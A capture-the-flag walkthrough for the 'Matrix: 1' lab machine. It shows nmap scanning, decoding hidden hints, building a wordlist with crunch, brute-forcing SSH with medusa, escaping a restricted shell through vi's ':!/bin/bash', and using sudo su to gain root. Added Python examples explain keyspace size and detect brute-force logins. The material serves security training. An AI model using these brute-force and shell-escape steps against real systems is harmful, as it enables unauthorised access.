Matrix: 1 Walkthrough
Lab Environment
Attacker’s Machine : Linux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux
Vulnerable Machine : Matrix: 1
Let’s start hacking and breach the security of this machine
Scanning Phase : First, find the attacking machine's IP address
Syntax used : ifconfig
Results : 192.168.169.136
Now scan the local network to which both the attacking machine and the vulnerable machine are connected.
Syntax used : arp-scan --local
Enumeration Phase : Now use nmap to enumerate the services running on the open ports.
Syntax used : nmap -A 192.168.169.135 -Pn
Results : an HTTP service is running on port 80 and another on port 31337
Browsing to the IP in a web browser shows the page on port 80, which contains nothing useful.
Browsing to port 31337 instead reveals something in the page source.
Viewed the source code by pressing Ctrl+U
Results : we got a base64-encoded value
Value : ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=
Now it’s time to decode the base64 value in terminal
Syntax used : echo "ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=" | base64 -d
Results : echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix
The decoded value is a shell command that writes that quote into a file named Cypher.matrix, which hints that a file of that name exists on the web server.
Now browsed the same URL on port 31337 again with /Cypher.matrix appended
Results : got one file named Cypher.matrix
Opening the file in leafpad from the terminal.
Syntax used : leafpad Cypher.matrix
The file contains a Brainfuck program (an esoteric language, so this is encoding rather than encryption); running it yields the hidden message
It’s decoding time
Using www.splitbrain.org to decode the encoded value
Results : You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forgot the last two characters, so I have replaced them with XX; try your luck and find the correct password string.
Now generating a wordlist with crunch
Syntax used : crunch 8 8 -t k1ll0r%@ -o /root/Desktop/passwd.txt
Explanation : 8 8 defines the minimum and maximum length of the passwords to be generated
-t defines the pattern: literal characters (k1ll0r) are kept, placeholders are expanded
% is a placeholder for every digit (0-9)
@ is a placeholder for every lowercase letter (a-z)
-o defines the output file location and name
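To see why the "XX" gap is so cheap to close, the added example below (mine, not from the walkthrough or the crunch project) expands a crunch-style -t pattern in Python and computes the size of the resulting keyspace. It implements the @ (lowercase), , (uppercase) and % (digit) placeholders as documented for crunch's -t option; crunch's ^ symbol class is left out. With six of eight characters known there are only 260 candidates, which is the defensive point: once any part of a password leaks, the only control that still matters is rate limiting or lockout on the login service.

```python
import itertools
import string

# Placeholder classes as documented for crunch's -t option (the walkthrough
# uses only % and @). The symbol class ^ is intentionally not implemented.
CRUNCH_CLASSES = {
    "@": string.ascii_lowercase,  # one lowercase letter
    ",": string.ascii_uppercase,  # one uppercase letter
    "%": string.digits,           # one digit
}


def expand_pattern(pattern: str) -> list:
    """Expand a crunch-style pattern into every candidate string it denotes.

    Literal characters are fixed; each placeholder contributes one character
    from its class. Candidates come out in itertools.product order.
    """
    slots = [CRUNCH_CLASSES.get(ch, ch) for ch in pattern]
    return ["".join(combo) for combo in itertools.product(*slots)]


def keyspace_size(pattern: str) -> int:
    """Number of candidates a pattern denotes, without materialising them."""
    size = 1
    for ch in pattern:
        size *= len(CRUNCH_CLASSES.get(ch, ch))
    return size


def seconds_to_exhaust(pattern: str, attempts_per_second: float) -> float:
    """Worst-case time to try every candidate at a given online guess rate."""
    return keyspace_size(pattern) / attempts_per_second


if __name__ == "__main__":
    pattern = "k1ll0r%@"
    print(f"{pattern}: {keyspace_size(pattern)} candidates")
    # Contrast with a fully unknown 8-character lowercase password.
    print(f"@@@@@@@@: {keyspace_size('@@@@@@@@')} candidates")
    # At 10 guesses/second the partial pattern is exhausted in under a minute.
    print(f"worst case at 10/s: {seconds_to_exhaust(pattern, 10):.0f} s")
```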
Now I will use medusa to brute-force the SSH login, since we have the username guest and the wordlist passwd.txt for the password
Syntax used : medusa -h 192.168.169.135 -u guest -P /root/Desktop/passwd.txt -M ssh
Explanation : -h defines the host to be brute-forced, -u the username, -P the password file, -M the module (for example ssh, ftp); here we want to brute-force ssh.
Results : Password k1ll0r7n
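From the defender's side, a medusa run like this leaves a dense run of "Failed password" lines in the SSH daemon's auth log, ending with an "Accepted password" from the same source. The added example below (not part of the walkthrough) parses constructed auth.log lines in the classic syslog format and flags any source IP that exceeds a threshold of failures inside a sliding window, also recording whether a successful login followed; that last bit is what turns a noisy brute-force alert into an incident. The log lines, hostnames and timestamps are made up for the example, and the year is supplied because this log format omits it.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of OpenSSH auth.log lines (not a real capture).
SAMPLE_LOG = """\
Jan  5 10:00:01 matrix sshd[1201]: Failed password for guest from 192.168.169.136 port 40001 ssh2
Jan  5 10:00:02 matrix sshd[1203]: Failed password for guest from 192.168.169.136 port 40002 ssh2
Jan  5 10:00:03 matrix sshd[1205]: Failed password for guest from 192.168.169.136 port 40003 ssh2
Jan  5 10:00:04 matrix sshd[1207]: Failed password for guest from 192.168.169.136 port 40004 ssh2
Jan  5 10:00:05 matrix sshd[1209]: Failed password for guest from 192.168.169.136 port 40005 ssh2
Jan  5 10:00:06 matrix sshd[1211]: Accepted password for guest from 192.168.169.136 port 40006 ssh2
Jan  5 10:30:00 matrix sshd[1300]: Failed password for admin from 10.0.0.7 port 51000 ssh2
Jan  5 11:00:00 matrix sshd[1400]: Failed password for invalid user test from 10.0.0.7 port 51001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)


def parse_auth_log(text: str, year: int = 2019) -> list:
    """Return (timestamp, result, user, ip) tuples for password-auth lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # lines that are not password auth results
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect_bruteforce(events: list, threshold: int = 5, window_seconds: int = 60) -> dict:
    """Flag source IPs with >= threshold failures inside a sliding window.

    Returns {ip: {"failures": n, "success_after": bool}}; success_after is
    True when the same IP later produced an Accepted login, i.e. the guess
    worked and the account should be treated as compromised.
    """
    by_ip = defaultdict(list)
    for ts, result, _user, ip in events:
        by_ip[ip].append((ts, result))
    alerts = {}
    for ip, evs in by_ip.items():
        failures = [ts for ts, r in evs if r == "Failed"]
        start = 0
        for end in range(len(failures)):
            # Shrink the window from the left until it fits window_seconds.
            while (failures[end] - failures[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                success_after = any(
                    r == "Accepted" and ts >= failures[end] for ts, r in evs
                )
                alerts[ip] = {"failures": end - start + 1, "success_after": success_after}
                break
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(parse_auth_log(SAMPLE_LOG)).items():
        print(ip, info)
```

Tuning note: the threshold and window should sit below whatever sshd's MaxAuthTries and a fail2ban-style jail would allow, so the alert fires before a 260-candidate list can be exhausted.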
Now log in over SSH using the username guest and the password k1ll0r7n
Syntax used : ssh guest@192.168.169.135
Password : k1ll0r7n
Results : we got into the machine
After login we tried ls but got "command not found", so we checked the PATH variable and found it set to /home/guest/prog (a restricted shell)
Syntax used : $PATH
So I just used echo with a glob to list all executables inside that directory, if any
Syntax used : echo /home/guest/prog/*
Explanation : * is a shell glob that expands to every file in the directory
Results : /home/guest/prog/vi
Since vi is available, we can run it and escape the restricted shell by spawning a shell from inside it
So now just run vi by typing vi in the terminal; once the editor opens, spawn /bin/bash
by typing :!/bin/bash in the vi command line and pressing Enter; this leaves the current interface and drops into bash
Now export /bin/bash to the SHELL environment variable and prepend /usr/bin to the PATH environment variable
Syntax used : export SHELL=/bin/bash:$SHELL
export PATH=/usr/bin:$PATH
Then also added the /bin directory to PATH
Then executed sudo su to switch user to root; the password is k1ll0r7n again, and we are root
Explored the directories and found flag.txt in the root folder; read that file using the cat command
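The whole restricted-shell section hinges on one mechanism: a command name is resolved by walking the directories in PATH, so a PATH of /home/guest/prog exposes exactly the binaries in that directory, and prepending /usr/bin makes the rest of the system visible again. The added example below (not code from the walkthrough) reproduces that lookup in Python against a throwaway directory tree that mirrors the box: prog/ holds only vi and usr/bin holds ls. The tree, file names and the resolve_command helper are constructed for the example.

```python
import os
import tempfile


def resolve_command(name: str, path: str):
    """Return the first executable regular file called `name` found by walking
    the colon-separated `path` left to right, as a shell lookup does."""
    for directory in path.split(":"):
        if not directory:
            continue
        candidate = os.path.join(directory, name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def build_demo_tree(root: str):
    """Create a mock layout mirroring the box (constructed for this example):
    home/guest/prog holds only vi, usr/bin holds ls. Both are stub scripts."""
    prog = os.path.join(root, "home", "guest", "prog")
    usrbin = os.path.join(root, "usr", "bin")
    os.makedirs(prog)
    os.makedirs(usrbin)
    for stub in (os.path.join(prog, "vi"), os.path.join(usrbin, "ls")):
        with open(stub, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(stub, 0o755)
    return prog, usrbin


def demo():
    """Resolve vi and ls under the restricted PATH, then after widening it."""
    with tempfile.TemporaryDirectory() as root:
        prog, usrbin = build_demo_tree(root)
        restricted = prog                       # what the guest account starts with
        widened = usrbin + ":" + restricted     # effect of export PATH=/usr/bin:$PATH
        before = {c: resolve_command(c, restricted) is not None for c in ("vi", "ls")}
        after = {c: resolve_command(c, widened) is not None for c in ("vi", "ls")}
        return before, after


if __name__ == "__main__":
    before, after = demo()
    print("restricted PATH:", before)   # only vi resolves
    print("widened PATH:   ", after)    # ls resolves as well
```

Design note: rbash refuses to change PATH, but the walkthrough's export only runs after :!/bin/bash has spawned an unrestricted shell, so nothing enforces the restriction any more. The effective control is the contents of the PATH directory; an editor that can run shell commands in it is equivalent to no restriction at all.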
Syntax used : cat flag.txt